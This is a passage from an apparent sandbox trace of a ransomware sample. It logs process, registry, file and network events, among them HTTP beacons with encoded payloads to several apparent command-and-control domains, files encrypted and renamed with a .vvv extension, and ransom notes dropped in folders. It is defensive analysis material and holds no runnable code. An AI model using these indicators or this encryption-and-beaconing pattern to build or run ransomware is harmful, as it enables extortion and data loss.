- imagepath: C:\WINDOWS\system32\vssadmin.exe
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- regkey:
- timestamp: 63668
- mode: added
- sequenceNumber: 674
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\Priority v4.00
- processinfo:
- pid: 1412
- imagepath: C:\WINDOWS\system32\vssadmin.exe
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- process:
- timestamp: 63684
- mode: opened
- sequenceNumber: 675
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1412
- imagepath: C:\WINDOWS\system32\vssadmin.exe
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- network:
- timestamp: 63753
- mode: http_request
- sequenceNumber: 676
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.2
- http_request: GET /raw HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: myexternalip.com~~~~
- apicall:
- timestamp: 63759
- sequenceNumber: 677
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemTime
- address: 0x63004857
- params:
- param (id:1): 0x1cde148
- apicall:
- timestamp: 63759
- sequenceNumber: 678
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: SystemTimeToFileTime
- address: 0x63004862
- params:
- param (id:1): 0x1cde148
- param (id:2): 0x1cde17c
- apicall:
- timestamp: 63767
- sequenceNumber: 679
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x76f28a9e
- params:
- param (id:1): 0x1cdc208
- param (id:2): 260
- network:
- timestamp: 63774
- mode: dns_query
- sequenceNumber: 680
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: irseek.com
- network:
- timestamp: 63784
- mode: dns_query_answer
- sequenceNumber: 681
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: irseek.com
- answer_number: 1
- ipaddress: 199.16.199.3
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 682
- timestamp: 63793
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 1412
- imagepath: C:\WINDOWS\system32\vssadmin.exe
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- network:
- timestamp: 63838
- mode: http_request
- sequenceNumber: 683
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.3
- http_request: GET /misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9F63EFB72FCDF5217D1E6D96F06E15D4E672C629E192C07D7C8F9BA6843020F2958FEAED748005792AABDF31037C8C08E HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: irseek.com~~Connection: Keep-Alive~~~~
- apicall:
- timestamp: 63850
- sequenceNumber: 684
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemTime
- address: 0x63004857
- params:
- param (id:1): 0x1cde148
- apicall:
- timestamp: 63854
- sequenceNumber: 685
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: SystemTimeToFileTime
- address: 0x63004862
- params:
- param (id:1): 0x1cde148
- param (id:2): 0x1cde17c
- apicall:
- timestamp: 63859
- sequenceNumber: 686
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x76f28a9e
- params:
- param (id:1): 0x1cdc208
- param (id:2): 260
- network:
- timestamp: 63866
- mode: dns_query
- sequenceNumber: 687
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: djepola.com
- network:
- timestamp: 63880
- mode: dns_query_answer
- sequenceNumber: 688
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: djepola.com
- answer_number: 1
- ipaddress: 199.16.199.4
- network:
- timestamp: 63888
- mode: http_request
- sequenceNumber: 689
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.4
- http_request: GET /misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A94E701C59E26AE09F9C25C4F5BA58B92BC0B439D0F7FE1305A29727C6F5471D962F04B11DA7BFE934C06A95F08161E52D HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: djepola.com~~Connection: Keep-Alive~~~~
- apicall:
- timestamp: 63899
- sequenceNumber: 690
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemTime
- address: 0x63004857
- params:
- param (id:1): 0x1cde148
- apicall:
- timestamp: 63902
- sequenceNumber: 691
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: SystemTimeToFileTime
- address: 0x63004862
- params:
- param (id:1): 0x1cde148
- param (id:2): 0x1cde17c
- apicall:
- timestamp: 63907
- sequenceNumber: 692
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x76f28a9e
- params:
- param (id:1): 0x1cdc208
- param (id:2): 260
- network:
- timestamp: 63914
- mode: dns_query
- sequenceNumber: 693
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: aprenderabailarsevillanas.com
- process:
- timestamp: 63921
- mode: terminated
- sequenceNumber: 694
- value: C:\WINDOWS\system32\vssadmin.exe
- pid: 1412
- ppid: 1056
- parentname: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- cmdline: N/A
- ads:
- fid (ads:): 281474976713206
- network:
- timestamp: 63926
- mode: dns_query_answer
- sequenceNumber: 695
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: aprenderabailarsevillanas.com
- answer_number: 1
- ipaddress: 199.16.199.5
- network:
- timestamp: 63939
- mode: http_request
- sequenceNumber: 696
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.5
- http_request: GET /wp-content/uploads/misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9BE2ABD2CB94BBE711C82A3574DD576B5CF604106D55E6F2BFE1D5A4A8056AE25C6ACCEE5C75320955910B98551B937D3BEE23BB4859D46B0B74354C1D39161C4 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: aprenderabailarsevillanas.com~~Connection: Keep-Alive~~~~
- apicall:
- timestamp: 63950
- sequenceNumber: 697
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemTime
- address: 0x63004857
- params:
- param (id:1): 0x1cde148
- apicall:
- timestamp: 63951
- sequenceNumber: 698
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: SystemTimeToFileTime
- address: 0x63004862
- params:
- param (id:1): 0x1cde148
- param (id:2): 0x1cde17c
- apicall:
- timestamp: 63959
- sequenceNumber: 699
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x76f28a9e
- params:
- param (id:1): 0x1cdc208
- param (id:2): 260
- network:
- timestamp: 63965
- mode: dns_query
- sequenceNumber: 700
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: apotheke-stiepel.com
- file:
- timestamp: 63976
- mode: find
- sequenceNumber: 701
- value: C:\*
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 64086
- sequenceNumber: 702
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemTime
- address: 0x63004857
- params:
- param (id:1): 0x1cde148
- apicall:
- timestamp: 64090
- sequenceNumber: 703
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: SystemTimeToFileTime
- address: 0x63004862
- params:
- param (id:1): 0x1cde148
- param (id:2): 0x1cde17c
- apicall:
- timestamp: 64096
- sequenceNumber: 704
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x76f28a9e
- params:
- param (id:1): 0x1cdc208
- param (id:2): 260
- network:
- timestamp: 64135
- mode: dns_query_answer
- sequenceNumber: 705
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: apotheke-stiepel.com
- answer_number: 1
- ipaddress: 199.16.199.6
- network:
- timestamp: 64141
- mode: http_request
- sequenceNumber: 706
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.6
- http_request: GET /tmp/misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A982909206FBB4E8B8DEE345079095D6FACB7D276F50256ABE4A878A2BE0B4BE80AB1296199D73873F2F3AB9240C58A0E884D7CBF6FEDF363779116AE3704406F5 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: apotheke-stiepel.com~~Connection: Keep-Alive~~~~
- network:
- timestamp: 64168
- mode: dns_query
- sequenceNumber: 707
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: woodenden.com
- network:
- timestamp: 64191
- mode: dns_query_answer
- sequenceNumber: 708
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: woodenden.com
- answer_number: 1
- ipaddress: 199.16.199.7
- network:
- timestamp: 64284
- mode: http_request
- sequenceNumber: 709
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.7
- http_request: GET /sysmisc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9528C52B38F260918A3043BBE6A78811A28D74C1407EE7F027502EBD14479D358D4046B9C1FD8982B78055D7999C8B76C HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: woodenden.com~~Connection: Keep-Alive~~~~
- Ransom:
- timestamp: 64319
- sequenceNumber: 710
- pattern: MC
- value: C:\215WKsGLLMxQa1\GGaYah.txt
- md5sum: 8f0185995a4a85019ecf7e15d3e35e05
- malicious-alert:
- classtype: Ransomware
- weight: 0
- ruleid: 8026 : Ransomware Activity ; Ransomware Activity
- msg: Ransomware Activity
- display-msg: Ransomware Activity
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10077 : Ransomware Activity ; Ransomware Activity
- msg: Ransomware Activity
- display-msg: Ransomware Activity
- Ransom:
- timestamp: 64401
- sequenceNumber: 711
- pattern: MC
- value: C:\215WKsGLLMxQa1\GnHpYkZmI.doc
- md5sum: c8b76c19ee0de57b34f122136d434ce9
- apicall:
- timestamp: 64600
- repeat: 40
- sequenceNumber: 712
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- Ransom:
- timestamp: 64763
- sequenceNumber: 713
- pattern: MC
- value: C:\215WKsGLLMxQa1\pkwPR.ppt
- md5sum: 799a531f6c79837147b8b9bc0b78fb03
- Ransom:
- timestamp: 64882
- sequenceNumber: 714
- pattern: MC
- value: C:\215WKsGLLMxQa1\Trtskn.jpg
- md5sum: b8ffaa241d96ec3c8f0ccf5b492e8639
- Ransom:
- timestamp: 65119
- sequenceNumber: 715
- pattern: MC
- value: C:\215WKsGLLMxQa1\WhjSVdR.xls
- md5sum: efa5e2bb29bad2497d2d0fe524ab4675
- Ransom:
- timestamp: 65363
- sequenceNumber: 716
- pattern: MC
- value: C:\215WKsGLLMxQa1\YnznjmIzF.png
- md5sum: 27076679f4ca30abd9d21bf039200f69
- file:
- timestamp: 65395
- mode: created
- sequenceNumber: 717
- value: C:\215WKsGLLMxQa1\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906910121
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65400
- mode: close
- sequenceNumber: 718
- value: C:\215WKsGLLMxQa1\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906910121
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65407
- mode: created
- sequenceNumber: 719
- value: C:\215WKsGLLMxQa1\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953488815
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65412
- mode: close
- sequenceNumber: 720
- value: C:\215WKsGLLMxQa1\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953488815
- ntstatus: 0x0
- CreateOptions: 0x0
- Ransom:
- timestamp: 65454
- sequenceNumber: 721
- pattern: MC
- value: C:\9b9vmbghrNMdA2\B_mOVHLoox.jpg
- md5sum: 980a526cf80358459ec855165596e154
- Ransom:
- timestamp: 65730
- sequenceNumber: 722
- pattern: MC
- value: C:\9b9vmbghrNMdA2\Die-L.ppt
- md5sum: 32b93875f6417c6c7ee1e62928537a79
- Ransom:
- timestamp: 65782
- sequenceNumber: 723
- pattern: MC
- value: C:\9b9vmbghrNMdA2\mVvr-X.doc
- md5sum: 6bf3ede98bab0f2d6a6f38ba63d68939
- Ransom:
- timestamp: 65879
- sequenceNumber: 724
- pattern: MC
- value: C:\9b9vmbghrNMdA2\qhhhkCFk.xls
- md5sum: d610d320106d97862dce6cb0157e2c03
- file:
- timestamp: 65915
- mode: created
- sequenceNumber: 725
- value: C:\9b9vmbghrNMdA2\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930199506
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65921
- mode: close
- sequenceNumber: 726
- value: C:\9b9vmbghrNMdA2\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930199506
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65942
- mode: created
- sequenceNumber: 727
- value: C:\9b9vmbghrNMdA2\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953488854
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 65989
- mode: close
- sequenceNumber: 728
- value: C:\9b9vmbghrNMdA2\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953488854
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 65994
- mode: find
- sequenceNumber: 729
- value: C:\Documents and Settings\*
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66006
- mode: find
- sequenceNumber: 730
- value: C:\Documents and Settings\*\*
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66009
- mode: find
- sequenceNumber: 731
- value: C:\Documents and Settings\*\Application Data\*
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66090
- mode: open
- sequenceNumber: 732
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav
- filesize: 566
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953480939
- ntstatus: 0x0
- CreateOptions: 0x60
- high_cpu:
- timestamp: 66095
- sequenceNumber: 733
- total_cpu: 100
- processinfo:
- tainted: true
- pid: 1824
- process_cpu: 100
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 66426
- mode: close
- sequenceNumber: 734
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav
- filesize: 990
- md5sum: 9e34bc93256def5cfb3e477a242b77c4
- sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953480939
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66435
- mode: rename
- sequenceNumber: 735
- filesize: 990
- md5sum: 9e34bc93256def5cfb3e477a242b77c4
- sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav
- new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav.vvv
- ads:
- fid (ads:): 562949953480939
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66462
- mode: created
- sequenceNumber: 736
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778199
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66470
- mode: close
- sequenceNumber: 737
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778199
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66489
- mode: created
- sequenceNumber: 738
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778200
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66501
- mode: close
- sequenceNumber: 739
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778200
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66512
- mode: open
- sequenceNumber: 740
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav
- filesize: 566
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953480940
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
